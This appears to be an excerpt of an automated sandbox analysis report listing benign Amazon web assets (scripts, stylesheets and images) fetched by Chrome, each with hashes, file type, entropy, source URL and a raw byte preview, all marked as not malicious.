                                                                                                                                                                                                                                                                      SSDEEP:192:Vb3JVaxC6DPmXsCXMdc1OdVLWRiJsNbKE08S12L1NOi:VLIC6De8RdVaRxNIoL1NOi
                                                                                                                                                                                                                                                                      MD5:74E590D62AE72E7CFE03C4EE6BD4EA5E
                                                                                                                                                                                                                                                                      SHA1:A0E05FE40A6233D78162A96EFDFD14077F1C6283
                                                                                                                                                                                                                                                                      SHA-256:50994C0128B4438C67A104BB948C40681FC8199B1A42FC48FC75BA5E6F814793
                                                                                                                                                                                                                                                                      SHA-512:D8AE8D4527D9286FC97CEA6A421547C6EEA20DB1BB9192F7FF6F36713689EF54A747333C343C825A56235ABBEF0827F2C0E693244C7F150D8CA7B330C145EB12
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/31OyASKbVLL.js
                                                                                                                                                                                                                                                                      Preview:/*! For license information please see react.production.min.js.LICENSE.txt */.!function(){"use strict";var e,t;e=this,t=function(e){function t(e,t,n){this.props=e,this.context=t,this.refs=L,this.updater=n||T}function n(){}function r(e,t,n){this.props=e,this.context=t,this.refs=L,this.updater=n||T}function o(e,t,n){var r,o={},u=null,a=null;if(null!=t)for(r in void 0!==t.ref&&(a=t.ref),void 0!==t.key&&(u=""+t.key),t)D.call(t,r)&&!V.hasOwnProperty(r)&&(o[r]=t[r]);var i=arguments.length-2;if(1===i)o.children=n;else if(1<i){for(var l=Array(i),c=0;c<i;c++)l[c]=arguments[c+2];o.children=l}if(e&&e.defaultProps)for(r in i=e.defaultProps)void 0===o[r]&&(o[r]=i[r]);return{$$typeof:g,type:e,key:u,ref:a,props:o,_owner:U.current}}function u(e){return"object"==typeof e&&null!==e&&e.$$typeof===g}function a(e,t){return"object"==typeof e&&null!==e&&null!=e.key?function(e){var t={"=":"=0",":":"=2"};return"$"+e.replace(/[=:]/g,(function(e){return t[e]}))}(""+e.key):t.toString(36)}function i(e,t,n,r,o){var
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 440x500, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):26757
                                                                                                                                                                                                                                                                      Entropy (8bit):7.970942194399967
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:1ZG0o8uXhv5zj1V1UPXLLtWPuUh5jxpVX9tC:LmXhB313Uj8GK7XPC
                                                                                                                                                                                                                                                                      MD5:8A96F4A1E9223C39E608E06EC89D39F4
                                                                                                                                                                                                                                                                      SHA1:BFB114255DEE4F67B10E71641AED71A60AF9BAA7
                                                                                                                                                                                                                                                                      SHA-256:E6593DAF0118114672F325E29F3883DC7EC773E41438DF09A99CC3A51AF9D7D9
                                                                                                                                                                                                                                                                      SHA-512:167EBE10A14FF8BD8E536F8D8681D776F48C6EB612FEF5FC7210FF5AF1C0A2777D7E69059ED7875EFFC2B7CA207EF16EED6FFE48392134DE27A9AA53AE5AB5D5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/sports-outdoors/revamp2022/EN-L2-Indoor-sports-Badminton-440x500.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#............."...............................................:s.eG........n.U....Vm.......Y.S&.42%.YL..r9`..T.z.....J(.......<.K.VWfv....,....m..F...._o.j...Kq.l.T.v+....%.....U........jf.$..^_.X.#f......K.U..Z....~.]t....J.4...B...U.-...N...ZL.n..5...G..i^....T.~CL].L.Uce..W.<....,....'...hj.%.m........R...s.j..6.[...7..3<...<...O.V......?..u..>.SW.h\..-.>w.....gQ.....S.......dD...}U.ZZ.ro.....>.....M.m.x...7..<.1....wE....9..3.uxw.eW.._M:.R.d.zn....z..,..-..}..{...UV..e.....s)U....U.^.m}..........M?utJ.....U.c.....:[15.i{.......E.0x..O.u.?..D..|[.J]n;mnOO5....Ql.,...J|-...;..0wY.?.mD..|G.Z[v;l....b9..;.,...8..]..._..*-_b..~E.U..VYw'...V .k..+hOj`^....._...W.W..\.......[...@..4.......zi.......S.cVJ..0Q....#...Z.;.VJ{.3....D.....-....y.&..f.n..;+%p...48.P.).Y....m.N...?..YF.:.~'
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 111x200, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):7513
                                                                                                                                                                                                                                                                      Entropy (8bit):7.946532685684176
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:Pd2rKcTJrj/PhM4JEn1J+iPgXHCcUKVGa4yjXV6qd:AT11M4QJxWC+gC4qd
                                                                                                                                                                                                                                                                      MD5:98FACFE423344FF1AF2942DD5A62B6F7
                                                                                                                                                                                                                                                                      SHA1:31AB4796D82617FCE6EBFE3A7DEE4020FF6690CF
                                                                                                                                                                                                                                                                      SHA-256:EAA84878B53CAE8541B4DB901EE958401247E554F33FBC53FAFD1D6A1ABDFA3F
                                                                                                                                                                                                                                                                      SHA-512:0C7B5C0AF6389702E02184DE55FFCFCD3FFA85FEA1693EC11E7401DDF190F9FAEED0A17DC931426E5078EF74D701DBC32F5F69FB5C1291376942C8409256D94E
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........o.."................................................................!1..A."Qa2Bqrs........#346RUbtu....$ST...c....5Cd...................................................1....!2Aq3BQR..r............?...;...P.5.Na.H......I.n..1$^%0..y...+..+3Y....2..{.....86$rl.*.5...sI...9..C....t.pW..9..`.,..C1L.z...j..(..J..:..z+.iJ.. ...k.].....*{.<....+nR.F...OkD....P..T.<.i..jb......e.n>.Gh9....!2RT.O.S..2..B2%.0fP.....E..L.L..yfp!.....M$.=C.?p^."K.........n..o...<o.?;...=?..`..-..Xb{A.?.+.....G.-B:.......5GA=t..4O4.8.4i\.z..|V..H.OQ..".c..n.....(c..7..).o2...D....7*.....>.(...U...2.I<K.J.qbt.e.u.euMf.......U..R..h..jv18....#..F...|YK(.F.tr..f.{..R..G......E..2.Z.Z.....a{.zm.8.[h.t.'.x.).,.....TR .e.-4......py.MA..r....(..{!u..k...B..r.....w.g......uC..?..8.K,.M...>U.P~"..<.5...;...4%D..h.....He.......in.....
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (26050)
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):176129
                                                                                                                                                                                                                                                                      Entropy (8bit):4.9829358467771385
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3072:gnH2o3pouSXmkglKEKajAQlkEXZKt4ReJRYMsj3rzuA:gnHcYMsjvuA
                                                                                                                                                                                                                                                                      MD5:1DB2F309481E19C8746F95E2F4406E41
                                                                                                                                                                                                                                                                      SHA1:E5997FCDA53406D903FD0F53383EAF65E111E073
                                                                                                                                                                                                                                                                      SHA-256:3005E40F9EC3532C7C75B9C98D62E4AA62BD39A406E85B8631533EABCDCBF0CA
                                                                                                                                                                                                                                                                      SHA-512:CA994E0DB3EC69DA6F1A0BEE6EDAF8DD6FC3FCBA555CDE9586CCA5E3B4209B7514BEC1F34FB34DC5466EDB492A18A5D7417887446C0D90F4DC17FA10494452DF
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:"https://images-eu.ssl-images-amazon.com/images/I/11EIQ5IGqaL._RC%7C01e5ncglxyL.css,01lF2n-pPaL.css,412sHz-V95L.css,31ASPyl+r4L.css,01GZEvC5WIL.css,11GEPqXartL.css,01qPl4hxayL.css,01ti0q+221L.css,413Vvv3GONL.css,11TIuySqr6L.css,01Rw4F+QU6L.css,115C34M4eKL.css,01DwiCRvNnL.css,01IdKcBuAdL.css,01dRHIoUjnL.css,21PrVsc9jNL.css,01oDR3IULNL.css,51nGGGD9eHL.css,01XPHJk60-L.css,11yW2wLgbZL.css,01QhqFH8I8L.css,21ZD1QLZ9FL.css,11JRZ3s9niL.css,21wA+jAxKjL.css,112NH+U6IxL.css,218hqIz39PL.css,01CFUgsA-YL.css,31Q6Yb4SLEL.css,116t+WD27UL.css,11uWFHlOmWL.css,11iezfFGyHL.css,11otOAnaYoL.css,01iEw2pcRVL.css,01X+Gu6WK9L.css,21L02xAJfDL.css,116NcDlHDOL.css,01LzHhtXxxL.css,214tZeCEi5L.css,11F00c3NoYL.css,11hvENnYNUL.css,11FRI-QT39L.css,01890+Vwk8L.css,01864Lq457L.css,01cbS3UK11L.css,21F85am0yFL.css,016mfgi+D2L.css,01WslS8q5ML.css,111YFRAP2PL.css,016Sx2kF1+L.css_.css?AUIClients/AmazonUI&Z0Le314P"
                                                                                                                                                                                                                                                                      Preview:button,input,select,textarea{font-family:inherit}h1,h2,h3,h4,h5,h6{padding:0;margin:0}h1,h2,h3,h4{padding-bottom:4px}h1,h2,h3,h4{text-rendering:optimizeLegibility}h1:last-child,h2:last-child,h3:last-child,h4:last-child{padding-bottom:0}h1.a-spacing-none,h2.a-spacing-none,h3.a-spacing-none,h4.a-spacing-none{padding-bottom:0}h1 .a-size-base,h1 .a-size-mini,h1 .a-size-small,h1.a-size-base,h1.a-size-mini,h1.a-size-small,h2 .a-size-base,h2 .a-size-mini,h2 .a-size-small,h2.a-size-base,h2.a-size-mini,h2.a-size-small,h3 .a-size-base,h3 .a-size-mini,h3 .a-size-small,h3.a-size-base,h3.a-size-mini,h3.a-size-small,h4 .a-size-base,h4 .a-size-mini,h4 .a-size-small,h4.a-size-base,h4.a-size-mini,h4.a-size-small{padding-bottom:0}h1,h2{padding-bottom:4px}h3,h4{padding-bottom:4px}.a-size-medium .a-row.a-size-base,h1 .a-row.a-size-base,h2 .a-row.a-size-base,h3 .a-row.a-size-base,h4 .a-size-large .a-row.a-size-base{padding-top:1px}.a-size-base .a-row.a-size-base{padding-top:0}.a-size-micro{font-size:10px;l
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 320x313, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):31229
                                                                                                                                                                                                                                                                      Entropy (8bit):7.984160951671787
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:ZgXUlE+tEs4N5WqwM4sJkceveJLLqCGcH3svHyAv:Z9e+tiNAqwYJkiWN+3mHVv
                                                                                                                                                                                                                                                                      MD5:E86B02934AE6085ED869E245BB50287F
                                                                                                                                                                                                                                                                      SHA1:9AA156D6DA149C1ACA256626DA72BAD6D72D6ADC
                                                                                                                                                                                                                                                                      SHA-256:EF2110BC3C35FFAEF2C6DDADD08805234C1AA8C43EE40C5EE223A15C18594770
                                                                                                                                                                                                                                                                      SHA-512:9A95167EC2A085E08BD9010EA69CB4B84EBB43829A8A17ADC0C81A1E26C2DE045DBD5CE96F74027400A415092FF5E76F03E9DD67AAC5E9D503CE3DB920972AF3
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......9.@.."..........5..................................................................$.y...|.e.)Usj1m*.B`..O.9%.I.I.I.I.I.I.I.I.....0.L{\..;.ST.........>...-..=.U.l..|.cc8.......&>..)E.....Viy..@.@.@.@....;.f6.W..Z..|..$...Z..9.$;..F..$.u.x..........I.....b_.2%.U....l37....VGhT...w......*t&V..z$@=.......!4.e5..O.)....Xa<....1...#..-:>.}.0....{..^..F..eq.F...........S.^...>E.9..^a..'!..^!&95Y.5.....^{.i...........esQ.....t+(.Q.=.6]lGD.M#.9J;O.n..I.(....Y..dT...\\.G....y.P..;xk.`._p.]y.....L....;.......o...=!S..,7.<.!..:...#....n../.y....H.{...p.f...=.9....k.1..0..aa..m...$be+....,r.r..9.'n5.n...{s7L...5.........Y...u.UZ.>..\.#.S.t=..5V..f]...X....kSYH.j.........B7l..\.......*..y...XdC.Z..3.j.....[.`.@..X..~...~M..^....z.|.M....;....pN.&.#T.E.Il.5N..1..a..qM...2.,...A{.r..iu......%S.X.;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 320x256, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):14598
                                                                                                                                                                                                                                                                      Entropy (8bit):7.933111973232418
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:7R4j4lVNRlMexbqmD3/02Dl9UkPHmeDgFXUx9IRfFXtkP6z68kVvEG9:NfNUmDv3Dl9xgdUxOXkaG9
                                                                                                                                                                                                                                                                      MD5:C7731FAB05A6AEE6B4606A095C6A7B30
                                                                                                                                                                                                                                                                      SHA1:6B20EC2A458D85C801BDD49610C87443932352C3
                                                                                                                                                                                                                                                                      SHA-256:CB2726C4E2987AA707181DF664FB9D4550252E1D139BF7E4DA1E6197E9BE0CB9
                                                                                                                                                                                                                                                                      SHA-512:A29CAF23CFF588D5926D0F6D7E39F5C7630F56062DAB522BA236C052C2644CBE39C1E39B36C4AD91B8CEF2A28520F4FEE506E5C55DFA8196D5CAE68ABF548CE4
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/613LeHTw6yL._AC_UL320_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........@.."..........6.............................................................................=<8{..B.....O>..qq.~Y.....n........T.EklFjc..c.............Z...(.d....adB....>>L.)......W?....T..o...z2...FyI....E...xy.....".....p.........U..5.:..=....d..y.>..-._9.pW..8..;"${....;2;:...WY5..B...l|.c....+...>'.8.~.../V.f........hr.KruO9...V.../f..#}.^.%rh.m.....b.p..AF.:L{...B.il.zXA.`X2.=`':......>.~....0.........>a..*>G.u......l....*.ka...F~L>.X.....,h...?U..m........5.Q-+.|....-..2.........p.h.UO...><J7.1J.Z."(...e.V..V(~.kA7= .@..^K'.[....g.s..Z...`...........0..f.3|.X.O..Y.OI..[....}l0wB.^....e.).IzL.U..=.*.l...V.:.5..]<..0..........R.V.S...E^7c%|.{..b...^.5.$.T..oZ...g.~D.......Zx.}....y?![b..:...\.<..Z.......-/....Uf .......UT`.Z.........y........R].....vZ..>...}{.....W+..zu_.z'^..[os.....d.R......+.gT
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, baseline, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):47170
                                                                                                                                                                                                                                                                      Entropy (8bit):7.954604166442297
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:vzN+jP4scXl8aa6I8g9oo0UCfYtVz9Q6A+978om2Xl/KpjgCwAJ:LqP4RXl8aa6I2JUcYtEHS8omOJKWC/J
                                                                                                                                                                                                                                                                      MD5:9639DFB50BAA471A02F584044BB4B0ED
                                                                                                                                                                                                                                                                      SHA1:6C3AF984842C582445235BD73869318D19003F54
                                                                                                                                                                                                                                                                      SHA-256:23FB1D846C8F4978C590FF3090C1BE25A3A501D11ED876D0C0690C8B646DAF01
                                                                                                                                                                                                                                                                      SHA-512:4AA26E84F45E157CBBF387FB4470297C48900A18B4553B21909B6144616499C96F9E2B5A110AD7F4C6155C55E89DB57A4349D349E82D2830086C24BDF291978D
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:.............................................................................................................................................2....Adobe.d............................................................................................................!..1."AQ.2a..#BVq....R....$%38brsu....&56CSctv...........4D.......7EFTWde............................!..1A.."Qaq...2R.........3BSbr...#T....$45.%Ccs..6..&D...............?.......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(...?........P..@(......P..@(...>.....,..x..*E..(...>.t<.|k...c.......~+..{Yy.e.O....|.7...w...Im*E......V.t....}m........H..n..w..5.m..W./..>_aa.xKQR,X.m..v\./....F..WC..O..........*|._J...R.x..D.p,......qc.$..U...G..IyR.D...a..'.^.'..9...w...n.c...mu..s....o.R.4H......d..V.....Q...-....Vu......i..E...../i...\.......[...8._s.....~i....0~'l..._.......2@.;.......S......uI..b..p.s^V\6.......f..lz........k[[.^.^.J......#O.t..)/7..,.<-.)E...y.....w..q.........._5]?..v........._...0.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:261-8635865-4706955:APAVCQJMFK78QJEV1PMZ$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.295396.0%26id%3DAPAVCQJMFK78QJEV1PMZ%26ctb%3D1%26sc0%3Dadplacements%3AsfImpression%3AGateway%3Aright-7%3Adesktop%26bb0%3D4772%26pc0%3D65846%26ld0%3D65815%26t0%3DWed%20Aug%2021%202024%2014%3A29%3A45%20GMT-0400%20(Eastern%20Daylight%20Time)%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DAPAVCQJMFK78QJEV1PMZ%26aftb%3D1%26lob%3D1:65845
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, baseline, precision 8, 440x300, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):20593
                                                                                                                                                                                                                                                                      Entropy (8bit):7.777484836286716
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:pmuvg3yZ2pWl2AdcgLCyJ9KRKUjJQCAZQxor/WT6qImkV:1vmpWl2AZCyJ9KRFjyZQxorO8ma
                                                                                                                                                                                                                                                                      MD5:DF3FA365459BCA6911668288ACC4D7FB
                                                                                                                                                                                                                                                                      SHA1:59DBAAC763F98FB008763A2F034F4BE5AC3F1D5D
                                                                                                                                                                                                                                                                      SHA-256:FBFA10EB87E7F0E4EA000FE56CAA31D67A461FD9486B59B2A1C4D9EDF92797A2
                                                                                                                                                                                                                                                                      SHA-512:A7FCB475C60D2E9D4CC0C0BEF7FF6D6BDB38409D1C6FD538561FCA13C84D07D41B7D7D01E12A15067EAA531F40D1C1E6B8BF503E9FCBA088A291567D1C245FA7
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/rbs_ohl_Gold/xcm_banners_mena_440x300_coop_4col_phl-barbeque_440x300_ae-en.jpg
                                                                                                                                                                                                                                                                      Preview:.....C....................................................................C.......................................................................,...."...........................................D..............................!1...Q.Aa."..#$23Rq..:....%)w..7Brx.............................../........................!."1.AQ.2a#$B.Rq34C..............?...............................................................................................................................................................................)..Bj.'.....9%[.......E~^.".+...........H....[eJ....AU\..p.I.3_|c.8..>...+..~ ...*.p.......1=.1V......J..m.H...LJ.ED.s...n]...Y..r`.]n..a.Z....\.I.(..q.F.l.........>.3.n.b..W3.J...I......bN?.}.4F.S....OP6|..U%.R.....eH,.6..h.#..C..dJ.tH.U.Ll......................................................................+]..B.Y....U....D..._...jeF..rw.VK$.q0.S.GO\.\.rD......r......}R..`..u.."k....>ig....AXy.|..E..n3.X.r.-.d.V*I.N0.0-.....1...........B..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, baseline, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):46167
                                                                                                                                                                                                                                                                      Entropy (8bit):7.950277040860971
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:veYMSa+HnE0iJxd40ayiLlLs+5Er1K2RpnUqC77lSmmNaFtVDVyl1RbaiY:faME9f+LlH5ErTpNCd1Jp0jaP
                                                                                                                                                                                                                                                                      MD5:2B3045AEA555086A1D361D0DE1C1B186
                                                                                                                                                                                                                                                                      SHA1:A99609B737D9D5D0EDF4C6D0489309C8B88189E1
                                                                                                                                                                                                                                                                      SHA-256:19E7FA7D29DA5092D254C10B242E6BEA712C3FAD0A2C32FF945C4EA70526C7BD
                                                                                                                                                                                                                                                                      SHA-512:09B7E055D846C4E36671275091370AA1DFC4542AB2ACAB4F8A1C50A7CD32A5B81470C938540A9C5F1A3EEDFD5D0AE3E57BBBCC440F28BBC9C3A64E4CE306DBAF
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:.............................................................................................................................................2....Adobe.d.............................................................................................................!..1."AQ.2a....#BVq..$Rb..368ru....%4Csv........Sd.....DFTWct.............................!..1.AQaq..."2R......Sr...3Bb......#4C...$%5cs&....D............?.......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(...?........P..@(......P..@(...>.....,..x..*E..(...>.t<.|k...c...s..X.W...Yw......*..o.w.3....KiR-,].....c....S.mc....L3........L......q...Xwo...T.. .c.].5K..m.Q..a..'.......m...=._.S..R.x..D.p,...%..qc..$....../..*....{.....O...O..s|.j..?........B.Nr..}....q.../.o....V........-....Uu..B..g.O......O.|N..Ys.>.J....o...dqR.'.C..k.O..{9..<e.=.|bs|r.......&.....*..|.\#%.'..-..>f...m.99-....e...-.!....Z..mo%x.z.*/l_.W.....~......g..oYJ/....v.....7.....O5.*.....7.,j.R.z....`....M.6..jtE..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, baseline, precision 8, 440x400, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):50614
                                                                                                                                                                                                                                                                      Entropy (8bit):7.947100794600626
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:1536:oa0dExo8EX2tOyI2AgTyEWFFFFFFFekkhkk4NV9f5LEJ:T0dVNgO4ryHpoJ
                                                                                                                                                                                                                                                                      MD5:9F0F5D95B1D863F2237F341A394B7A25
                                                                                                                                                                                                                                                                      SHA1:DCA440EF90B5E58901EF10FED62BA851315E2F91
                                                                                                                                                                                                                                                                      SHA-256:A004F5B4D0FC51606C9F2286BA0FE7A66DDD9D9A971F0E6D840F361C07DAB34F
                                                                                                                                                                                                                                                                      SHA-512:EEA00FED9D58034B6E1A047FDA634BD1ADBF61E6A0ED1397FA420E66B27441756BD1E0384352EB8B21BE9FAFDB2C1A644355800B6A3F4FBC8BD12C723A8C962F
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:.....C....................................................................C............................................................................"...........................................H..............................!..QT.."1A...#.2aqr.$3....%....4BDRb.......................................E.............................!1.A."Q2aq...#$..BCR..34br......'S................?..C..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.c..1.e9..c...X...1...,.c......c.G...C..E.c'.z?&?....=........1........~.<.~L.t?K$X.2{..c...X...1...,.c......c.G...C..E.c'.z?&?....=........1........~.<.~L.t?K$X.2{..c...X...1...,.c......c.G...C..E.c'.z?&?....=........1........~.<.~L.t?K$X.2{..c...X...1...,.c......c.G...C..E.c'.z?&?....=........1........~.<.~L.t?K$X.2{..c...X...1...,.c......c.G...C..E.c'.z?&?....=........1........~.<.~L.t?K$X.2{..c...X...1...,.c......c.G...C..E.c'.z?&?....=........1........~.<.~L.t?K$X.2{..c...X...
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):3718
                                                                                                                                                                                                                                                                      Entropy (8bit):7.688627378509351
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:TGgtPDzAKOsZ1aYkI62zket4JpBOjuwFLPv0iE97ynBQr1FjWMwon:nbzn1aG62lSRwuwF4iENyniFion
                                                                                                                                                                                                                                                                      MD5:2432EBFE16068CE8B56632DB9174309B
                                                                                                                                                                                                                                                                      SHA1:593B1BD3574A7AA1CC2C6E8D56EEF25AAEF3DF52
                                                                                                                                                                                                                                                                      SHA-256:EFA0C13C821530BB771903C86D0454D49A38E0F0E1182733275983077F820AD1
                                                                                                                                                                                                                                                                      SHA-512:C584CD0BA66F9F74F8F551880808325F99A10E77688E6BA2DC5F88A907795EE298ADCD79DE459BFEEE151F1578272334977BA4F2312A15E51825AB69426BC6BE
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........1..............................................................X....................................!z.-.I............Cy4W&.h.c}....y.5=..&-....3.YZ..........H.sCr...Q.[.E.gR..K........]eN.*.V..5..C...h...|;.D;.._....QcF...e|.....x.....]K....n.a....v.......&.6..... %."...mU..`Pm#..S..>!......G.].M.z.x.../..`.j..dC..V.....t..Y...~#[...cE......n.=j.........X.).....#..&.%..+@..[.*]b$.c..9Y...o)....7.1...,.b.2.).W.....S.. .c.........-.....^q..]i9............`d.q..u.A...[0..|=.)X..x...:l.`#..""<{H`.D.......k.C.t..#.!.<..p....H..G....................................?...+..........................3.!01.. "2#p.@A............s.EU......q..:..W8...\.us..S....:.N.S....:.N.S......It.U.J2.....M..e6.m...6...JIOo.3!)...EO.^(.5|R..FFFFFFFFFFDr...I.F..{(c.]Ug,lk.Yn....Q.j......@......h.&..._.........
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:PNG image data, 400 x 900, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):16237
                                                                                                                                                                                                                                                                      Entropy (8bit):7.914373477606932
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:uZUkQ4lr5sLQMaphjMr2VqWT33ZoXgsICdjyt8bpBXG8OfQwZop96OJ+CTy5:ui4B0arXq8ygCdjTHWfQ8opRpy5
                                                                                                                                                                                                                                                                      MD5:52B8D386D2B1D407C71A4AE966B61ADD
                                                                                                                                                                                                                                                                      SHA1:B962650FFFC15637F0D9F57C332702459F084B7B
                                                                                                                                                                                                                                                                      SHA-256:D47C1E50DB91BB597B75EDC63362CD0C568E4F5F15A3F8BE1B6ADFF24E89E447
                                                                                                                                                                                                                                                                      SHA-512:C6B69AF93D0683324A86CBEE5575E42A293C8588267C49034D1CC9AB3635034897838F9D5EA665B694C90D72CFE2B3F462CAD907CC74749E9AF863A90D233998
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/S/sash/McBZv0ZvnbehkIx.png
